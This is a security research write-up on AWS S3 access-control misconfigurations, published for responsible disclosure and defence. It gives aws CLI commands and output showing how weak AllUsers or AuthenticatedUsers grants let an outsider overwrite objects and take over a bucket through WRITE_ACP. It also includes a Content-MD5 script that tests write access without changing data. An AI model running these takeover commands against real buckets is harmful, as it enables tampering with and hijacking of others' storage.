Frans Rosén
TL;DR: Setting up access control of AWS S3 consists of multiple levels, each with its own unique risk of misconfiguration. We will go through the specifics of each level and identify the dangerous cases where weak ACLs can create vulnerable configurations, impacting the owner of the S3-bucket directly and/or, through third-party assets, the many companies using them. We also show how to do it properly and how to monitor for these sorts of issues.
A simplified version of this write-up is available on the Detectify blog.
Amazon Web Services (AWS) provides a service called Simple Storage Service (S3) which exposes a storage container interface. The storage container is called a “bucket” and the files inside the bucket are called “objects”. S3 provides unlimited storage for each bucket, and owners can use it to serve files. Files can be served either privately (via signed URLs) or publicly via an appropriately configured ACL (Access Control List) or ACP (Access Control Policy).
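As a side note on the private option, a time-limited signed URL can be generated with a current AWS CLI; a small sketch, where test-bucket/read.txt is a made-up example object:

$ aws s3 presign s3://test-bucket/read.txt --expires-in 3600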
AWS also provides a CDN (Content Delivery Network) service called CloudFront, which is often configured to quickly serve S3-hosted files/objects from an optimized CloudFront server as close as possible to the user requesting the file.
Recently, a few blog posts have mentioned scenarios where the misconfiguration of an S3 bucket may expose sensitive data, as well as explaining that S3 access control lists (ACLs) are quite different from the regular user permission setup in AWS, which is called Identity and Access Management (IAM).
However, we decided to approach this from a different angle. By identifying a number of different misconfigurations, we discovered that we could suddenly control, monitor and break high-end websites due to weak configurations of bucket and object ACLs.
All instances disclosed below were reported to the affected parties using responsible disclosure policies. In some of the cases, third party companies were involved and we got assistance from the companies affected to contact the vulnerable party.
We do not recommend testing any of the vulnerable scenarios below without prior approval. This is especially important in scenarios where the only way to identify the vulnerability was to actually override files and configurations. We did, however, identify one method to detect one of the vulnerable setups without actually modifying the data. You should still make sure you’re not affecting any party that has not given you written approval.
The different misconfigurations and the impact of each depend on several criteria: who owns the bucket, how the bucket is reached, and which ACLs are set on the bucket and on the objects inside it. We will try to go through all the different cases below and explain when they can result in a vulnerable misconfiguration.
To start off, we need to be able to identify buckets owned by or used by the company. We need the specific bucket’s name to make signed requests to the bucket.
Identifying a bucket depends on the setup and also how the bucket is being reached: The request can go directly to S3, to CloudFront (or any other CDN proxy serving files from the bucket), to the S3 “Static Website” option, or more.
Some methods to identify S3-buckets are:
- Look at the HTTP response for a Server-header which says AmazonS3.
- Request a URL that does not exist; an S3-style error document will contain Access Denied or NoSuchKey.
- Try the root URL of the bucket; if index listing is enabled, the bucket name is shown in the <Name>-element of the XML response.

We have identified multiple ways to make an S3-bucket actually reveal itself independent of proxies in front of it. We have notified AWS about these methods and chosen not to mention them above.
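As a hedged illustration of the first two methods above, a quick fingerprint from the command line could look like this (the host is a made-up example):

# Check the Server-header for AmazonS3
curl -s -I "https://media.acme.edu/" | grep -i '^server:'
# Request a key that should not exist and look for an S3-style error document
curl -s "https://media.acme.edu/does-not-exist-$(date +%s)" | grep -oE 'NoSuchKey|AccessDenied'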
If you do find a domain that is pointing to a bucket but cannot get the bucket name, try the actual fully qualified domain name (FQDN) as the bucket name; this is a common setup, where the bucket is named after the domain that is pointing to it.
If this doesn’t work, try permutations based on the domain and company name: if the domain is media.acme.edu, try media.acme.edu, acme-edu-media, acme-audio or acme-media.
If the response on $bucket.s3.amazonaws.com shows NoSuchBucket, you know the bucket doesn’t exist. An existing bucket will give you either ListBucketResult or AccessDenied. (You might also stumble upon AllAccessDisabled; these buckets are completely dead.)
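A minimal sketch of that check, looping over guessed names (the names are made up; path-style URLs avoid TLS issues with dots in bucket names):

for b in media.acme.edu acme-edu-media acme-audio acme-media; do
    # NoSuchBucket => does not exist; ListBucketResult or AccessDenied => the bucket exists
    status=$(curl -s "https://s3.amazonaws.com/${b}/" | grep -oE 'NoSuchBucket|ListBucketResult|AccessDenied' | head -1)
    echo "${b}: ${status:-unknown}"
done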
Remember, just because a bucket is named after the company or similar, that doesn’t mean it is owned by that company. Try to find references directly from the company to the bucket to confirm it is indeed owned by the specific company.
First, we will explore the different options that can be used for giving access to a requester of a bucket and the objects within:
You are able to give access to a single user inside AWS using either the AWS user ID or their email address. This makes sense if you want to allow a single user to have specific access to the bucket.
This is probably the most misunderstood predefined group in AWS S3’s ACL. Having the ACL set to AuthenticatedUsers basically means “anyone with a valid set of AWS credentials”. All AWS accounts that can sign a request properly are inside this group. The requester doesn’t need to have any relation at all with the AWS account owning the bucket or the object. Remember that “authenticated” is not the same thing as “authorized”.
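As a sketch of what this means: if the grant is set, signing the request with any AWS account, completely unrelated to the bucket owner, is enough (the profile name is made up, test-bucket is the example bucket used throughout this post):

$ aws s3 ls s3://test-bucket --profile my-unrelated-personal-account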
The Everyone group, AllUsers, is likely the most common reason a bucket is found vulnerable in the first place. When this grant is set, the requester doesn’t even need to make an authenticated request to read or write any data; anyone can make a PUT request to modify an object or a GET request to download one, depending on the policy that is configured.
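As a sketch of what that looks like in practice, the AWS CLI can skip signing entirely:

# GET without any credentials at all
$ aws s3api get-object --no-sign-request --bucket test-bucket --key read.txt /tmp/read.txt
# PUT without any credentials at all
$ aws s3api put-object --no-sign-request --bucket test-bucket --key poc.txt --body poc.txt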
The following permissions can be set on the bucket or on the objects inside the bucket. The ACPs on buckets and objects control different parts of S3; AWS has a list showing exactly what each grant does. There are more cases not mentioned below where you can create specific IAM policies for a bucket, called a bucket policy. Creating a bucket policy has its own issues; however, we will only cover the standard setup of ACLs set on buckets and objects.
READ gives the ability to read content. If this ACP is set on a bucket, the requester can list the files inside the bucket. If it is set on an object, the object’s content can be retrieved by the requester.
READ will still work on specific objects inside a bucket, even if Object Access READ is not set on the complete bucket.
With the following ACL setup inside AWS S3:
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
We can still read the specific object:
$ aws s3api get-object --bucket test-bucket --key read.txt read.txt
{
    "AcceptRanges": "bytes",
    "ContentType": "text/plain",
    "LastModified": "Sun, 09 Jul 2017 21:14:15 GMT",
    "ContentLength": 43,
    "ETag": "\"1398e667c7ebaa95284d4efa2987c1c0\"",
    "Metadata": {}
}
This means READ can be different for each object, independently of the settings on the bucket.
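The bucket-level half of READ, listing the keys, can be checked just as easily and non-destructively:

$ aws s3api list-objects --bucket test-bucket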
This permission gives the ability to read the access control list of the bucket or object. If this is enabled, you can identify vulnerable assets without trying to modify the content or ACP at all.
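A sketch of that non-destructive check against the example bucket:

# With READ_ACP you can enumerate the grants without modifying anything
$ aws s3api get-bucket-acl --bucket test-bucket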
READ_ACP will still work on specific objects inside a bucket, even if Object Access READ_ACP is not set on the complete bucket.
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
$ aws s3api get-object-acl --bucket test-bucket --key read-acp.txt
{
    "Owner": {
        "DisplayName": "fransrosen",
...
This means READ_ACP can be different for each object, independently of the settings on the bucket.
This permission gives the ability to write content. If the bucket has this enabled for a user or group, that party can upload, modify and create new files.
WRITE will not work on specific objects inside a bucket if Object Access WRITE is not set on the complete bucket:
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt
An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
However, if WRITE is set on the bucket, all objects will obey and will not be able to decide individually whether they should be writable or not:
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt
{
    "ETag": "\"1398e667c7ebaa95284d4efa2987c1c0\""
}
This means WRITE can be verified on a bucket in two ways: either by uploading a random file, or by modifying an existing one. Modifying an existing file is destructive and should not be done at all. Below we will explain a way to check this without doing a destructive call, by triggering an error between the access-control check and the actual modification of the file.
This permission gives the ability to modify the permission ACL of a bucket or object. If the bucket has this enabled for a user or a group, that party can modify the ACL of the bucket, which is extremely bad. Having WRITE_ACP on a bucket completely exposes it to be controlled by the party the ACP is set for, meaning the content of any object can now be controlled by that party. The attacker might not be able to READ every object already in the bucket, but they can still fully replace the existing objects. Also, the initial owner of the S3-bucket will get an Access Denied error in the new AWS S3-console when the attacker claims ownership of the bucket by removing the READ access on it.
First, we have no access to READ_ACP or WRITE:
$ aws s3api get-bucket-acl --bucket test-bucket
An error occurred (AccessDenied) when calling the GetBucketAcl operation: Access Denied

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
Then we try to change the bucket ACL:
$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
success
The initial owner of the bucket will now get an Access Denied error in the S3 console. (Being the owner, they will still be able to modify the policy of the bucket, but this is a weird case anyway.)
We can now control everything:
$ aws s3api get-bucket-acl --bucket test-bucket
{
    ...
    "Grants": [
        {
            "Grantee": {
                "Type": "CanonicalUser",
                "DisplayName": "frans",
                "ID": "..."
            },
            "Permission": "FULL_CONTROL"
...

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
{
    "ETag": "\"1398e667c7ebaa95284d4efa2987c1c0\""
}
A very interesting thing is that WRITE_ACP will actually still work on specific objects inside a bucket, even if Object Access WRITE_ACP is not set on the complete bucket:
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success
Also, the opposite of WRITE applies here: having WRITE_ACP on the bucket doesn’t mean you directly have WRITE_ACP on an object:
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com
An error occurred (AccessDenied) when calling the PutObjectAcl operation: Access Denied
However, when you have WRITE_ACP on the bucket, you can still gain full control of the content of any object by performing the following steps, replacing the existing object with new content:
$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
success
$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
{
    "ETag": "\"1398e667c7ebaa95284d4efa2987c1c0\""
}
$ aws s3api put-object-acl --bucket test-bucket --key write1.js --grant-full-control emailaddress=frans@example.com && echo "success"
success
Since WRITE still needs to be set on the bucket, you cannot upgrade a WRITE_ACP on an object to give yourself WRITE on the same object:
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt \
    --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers \
    --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers \
    --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers \
    --grant-read uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success
Bucket-ACL and Object-ACL: [screenshots of the grants in the S3 console]
This will still give you:
$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
However, you can still remove all ACPs on the object, making the object completely private, which will stop it from being served, giving a 403 Forbidden.
WRITE_ACP can unfortunately only be verified by writing a new ACP on a bucket or object. Modifying the existing one is of course destructive and should not be done without approval; we have not found a non-destructive way of testing this ACP.
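If you happen to hold READ_ACP as well, one way to limit the damage while testing (a sketch of our own, not something covered by the original research) is to snapshot the current ACP and restore it immediately afterwards:

# Snapshot the current ACP (requires READ_ACP)
$ aws s3api get-object-acl --bucket test-bucket --key write-acp.txt > /tmp/acl-backup.json
# Destructive test: write a new ACP
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com
# Restore the original grants from the snapshot
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --access-control-policy file:///tmp/acl-backup.json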
FULL_CONTROL combines all other permissions. However, WRITE will still not work on an object unless the bucket has it set, even if this permission is set on the object.
The following scenarios are cases where the company can be affected.
You found a bucket which is served by a subdomain or domain of the company.
If AllUsers or AuthenticatedUsers has WRITE_ACP set, we know we can gain full control over the bucket, without doing anything else.

To verify WRITE non-destructively, we can abuse a checksum header: when uploading a file to S3, you can send a header called Content-MD5, telling AWS the checksum of the content being uploaded. It turns out that this check happens at a very convenient point in S3’s write flow.
Since the checksum control happens after we know that we have access to the file, but before actually modifying it, we do not need to write to the file to know that we are able to.
The following bash code simulates this scenario:
#!/bin/bash
# use this by: ./put-simulate.sh test-bucket/write.txt
AWS_ACCESS_KEY_ID="***"
AWS_SECRET_ACCESS_KEY="***"
AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)"
AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)"
date=$(date +"%a, %d %b %Y %T %z")
acl="x-amz-acl:private"
content_type='application/octet-stream'

# we create a checksum of the word "yepp", but will upload a file with the content "nope"
content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64)

# sign the request (AWS Signature Version 2 string-to-sign)
string="PUT\n${content_md5}\n${content_type}\n${date}\n${acl}\n/${AWS_S3_BUCKET}${AWS_PATH}"
signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64)

echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}"
result=$(curl -s --insecure -X PUT --data "nope" \
    -H "Host: ${AWS_S3_BUCKET}.s3.amazonaws.com" \
    -H "Date: $date" \
    -H "Content-Type: ${content_type}" \
    -H "Content-MD5: ${content_md5}" \
    -H "$acl" \
    -H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" \
    "https://${AWS_S3_BUCKET}.s3.amazonaws.com${AWS_PATH}")

if [ "$(echo ${result} | grep 'The Content-MD5 you specified did not match what we received')" != "" ]; then
    echo "SUCCESS: ${AWS_S3_BUCKET}${AWS_PATH}"
    exit 0
fi
echo "$result"
exit 1
On a bucket we can upload to, this will result in:
$ ./put-simulate.sh test-bucket/write.txt
PUT to S3 with invalid md5: test-bucket/write.txt
SUCCESS: test-bucket/write.txt
On a bucket we cannot upload to, this will result in:
$ ./put-simulate.sh test-secure-bucket/write.txt
PUT to S3 with invalid md5: test-secure-bucket/write.txt
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message>
We will therefore never modify the content, only confirm that we can do it. This unfortunately only works for WRITE on objects, not for WRITE_ACP, as far as we know.

Also remember that you might be able to set a new ACP on an object using WRITE_ACP even though you do not have access to READ_ACP.

If uploads instead happen through signed POST policies, look at which parts of the upload the policy actually locks down, typically the $key and the Content-type. Depending on whether they use starts-with, you might be able to modify the content type to HTML/XML/SVG or similar, or change the location of the file being uploaded. A sketch of such a policy follows.
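As an illustration only, a hypothetical POST policy with loose conditions might look like this; the bucket name, key prefix and date are made up. The empty starts-with on Content-Type lets the uploader choose text/html:

{
    "expiration": "2017-12-31T12:00:00.000Z",
    "conditions": [
        {"bucket": "test-bucket"},
        ["starts-with", "$key", "uploads/"],
        ["starts-with", "$Content-Type", ""]
    ]
}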
Additional Disclaimer: The assets being used by a company might not always be owned by the company. You need to be extremely careful here not to attack anyone other than the intended target who has given you permission to test.
There are projects trying to automate this, such as Second Order. However, Second Order only checks for assets referenced in the HTTP response; files loaded dynamically are not checked. Below is a quick example of also catching dynamically loaded assets using Headless Chrome.
First, start the headless version on port 9222:
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --disable-gpu --headless
We can then use a small script (context.js is borrowed from the HAR-capturer project, since that one properly closes tabs):
const CDP = require('chrome-remote-interface');
const URL = require('url').URL;
const Context = require('./context');

async function log_requests(orig_url) {
    const context = new Context({});
    process.on('SIGTERM', function () {
        context.destroy();
    });
    try {
        const client = await context.create();
        const {Network, Page} = client;
        const ourl = new URL('http://' + orig_url);
        const ohost = ourl.host;
        Network.requestWillBeSent((params) => {
            if (params.request.url.match('^data:')) {
                return;
            }
            const url = new URL(params.request.url);
            console.log(ohost + ':' + url.host + ':' + params.request.url);
        });
        await Promise.all([Network.enable(), Page.enable()]);
        await Page.navigate({url: 'http://' + orig_url});
        await Page.loadEventFired();
        await Page.navigate({url: 'https://' + orig_url});
        await Page.loadEventFired();
    } finally {
        await context.destroy();
    }
}

const url = process.argv.slice(2)[0];
log_requests(url);
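Assuming the script above is saved as log-requests.js (the filename is our own) next to context.js, a run looks like:

$ node log-requests.js example.com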
This will give us all assets on the page, which we can then use to figure out whether they are served from S3 or not.
This one is a bit complicated. You need to have clear evidence and proof that the bucket is indeed owned by the company. Try to find references from the company pointing to this bucket, such as references on their website, CI logs or open source code.
During this research we were able to confirm we could control assets on high profile websites. We reported these issues directly and were able to get them solved quickly. The following categories of websites were affected:
We identified vulnerable assets placed on the login pages of some companies.
In some cases, vulnerable assets were loaded using Google Tag Manager (gtm.js); however, the third parties were not sandboxed properly, so the third-party assets ran directly on the domain itself (rather than being sandboxed via www.googletagmanager.com).
We got in touch with some third-party providers, both directly and with help from the affected companies, and the issues were identified and solved very quickly.
The following processes can prevent this issue from happening:

- Make sure WRITE and WRITE_ACP are only set for specific users, never for groups such as AllUsers or AuthenticatedUsers.
- For WRITE_ACP, test yourself by running aws s3api put-object-acl with the appropriate settings, using a restricted AWS user, against your own objects in your buckets. You might need to update the ACL on every object to mitigate this completely.

It’s clear after this research that this problem is widespread and hard to identify and completely solve, especially if the company uses a huge number of buckets created by different systems. WRITE_ACP is the most dangerous permission for the reasons mentioned, both on buckets and objects.
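As a starting point for the monitoring mentioned in the TL;DR, a minimal audit sketch over your own account could look like this; note that it only inspects bucket ACLs, not the per-object ACLs discussed above:

# Flag buckets that grant anything to the AllUsers or AuthenticatedUsers groups
for b in $(aws s3api list-buckets --query 'Buckets[].Name' --output text); do
    if aws s3api get-bucket-acl --bucket "$b" --output json | grep -qE 'AllUsers|AuthenticatedUsers'; then
        echo "review the grants on: $b"
    fi
done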
An interesting detail: when manually uploading files to S3 using Cyberduck, all the possible access-control grants for a file are listed right next to each other, and it is pretty easy to accidentally pick the wrong one there.
Until next time.
Detectify tests web applications for S3 misconfiguration vulnerabilities like these, with severities ranging from 4.4 to 9 on the CVSS scale.